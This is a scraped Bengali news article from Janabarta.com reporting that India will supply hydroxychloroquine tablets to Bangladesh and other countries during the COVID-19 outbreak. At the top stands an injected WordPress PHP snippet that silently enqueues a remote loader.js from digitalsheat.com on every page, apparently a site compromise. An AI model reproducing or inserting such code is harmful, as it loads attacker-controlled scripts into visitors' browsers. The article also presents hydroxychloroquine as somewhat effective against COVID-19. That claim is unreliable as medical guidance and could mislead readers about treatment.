// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site বাংলাদেশকে ২০ লাখ হাইড্রোক্সিক্লোরোকুইন দেবে ভারত - Janabarta.com

বাংলাদেশকে ২০ লাখ হাইড্রোক্সিক্লোরোকুইন দেবে ভারত

নিজস্ব প্রতিবেদক: নভেল করোনাভাইরাসের চিকিৎসায় ম্যালেরিয়ার ওষুধ হাইড্রোক্সিক্লোরোকুইন (এইচসিকিউ) কিছুটা কার্যকর বলে প্রমাণ পেয়েছেন ভারতের চিকিৎসকরা। এ খবর চাউর হলে ৩০টি দেশ ভারত সরকারের কাছে এ ওষুধের জন্য আবেদন করে। যার মধ্যে ১৩টি দেশকে এই ওষুধ দিতে সম্মত হয়েছে মোদি সরকার। তারমধ্যে একটি বাংলাদেশ।

রোববার সূত্রের বরাত দিয়ে ভারতীয় সংবাদমাধ্যম এনডিটিভি জানায়, বাংলাদেশকে ২০ লাখ এইচসিকিউ ট্যাবলেট দেবে ভারত। এছাড়া যুক্তরাষ্ট্র, জার্মানি, স্পেন, ব্রাজিল, শ্রীলঙ্কা, নেপাল, ভুটান, মালদ্বীপ, আফগানিস্তান, বাহরাইন, সিসিলিস ও ডমিনিকান রিপাবলিককেও দেয়া হবে ওষুধটি।

হাইড্রোক্সিক্লোরোকুইন ট্যাবলেটের পাশাপাশি কাঁচামালও (এপিআই) সরবরাহ করবে ভারত। বিভিন্ন দেশে মোট ১৪ মিলিয়ন ট্যাবলেট ও ১৩ দশমিক ৫ মেট্রিক টন কাঁচামাল সরবরাহ করবে মোদি সরকার।

খবরে আরো বলা হয়, যুক্তরাষ্ট্র ভারতের কাছে ৪৮ লাখ হাইড্রোক্সিক্লোরোকুইন ট্যাবলেট চেয়েছে। বিপরীতে দেশটিকে দেওয়া হবে শুধু ৩৫ লাখ ৮২ হাজার। পাশাপশি কাঁচামাল দেওয়া হবে ৯ মেট্রিক টন।

এনডিটিভি আরো জানায়, প্রথম চালানে ব্রাজিল ও জার্মানিকে যথাক্রমে শূন্য দশমিক ৫৩ মেট্রিক টন ও ১ দশমিক ৫ মেট্রিক টন কাঁচামাল দিচ্ছে ভারত। পরে দ্বিতীয় চালানে দুই দেশকেই ৫০ লাখ করে ট্যাবলেট দেওয়া হবে।

এছাড়া কানাডাকে ৫০ লাখ, নেপালকে ১০ লাখ, ভুটানকে ২ লাখ, মালদ্বীপকে ২ লাখ, আফগানিস্তানকে ৫ লাখ, শ্রীলঙ্কাকে ১০ হাইড্রোক্সিক্লোরোকুইন ট্যাবলেট দেবে ভারত।

এর আগে ভারতের পররাষ্ট্র মন্ত্রণালয় থেকে বলা হয়, মানবিক কারণে হাইড্রক্সিক্লোরোকুইনের ওপর আরোপিত নিষেধাজ্ঞা তুলে নেওয়া হয়েছে। ইতোমধ্যে গুজরাটের তিনটি করখানা থেকে যুক্তরাষ্ট্রে ২ কোটি ৯০ লাখ ডোজ ওষুধ পাঠানোর প্রক্রিয়া চূড়ান্ত করেছে ভারত সরকার। এরপর জরুরি ভিত্তিতে পাঠানো হবে স্পেন, জার্মানিসহ ভয়ংকরভাবে আক্রান্ত ইউরোপের আরো কয়েকটি দেশে। শিগগিরই বাংলাদেশও পাবে এই ওষুধ।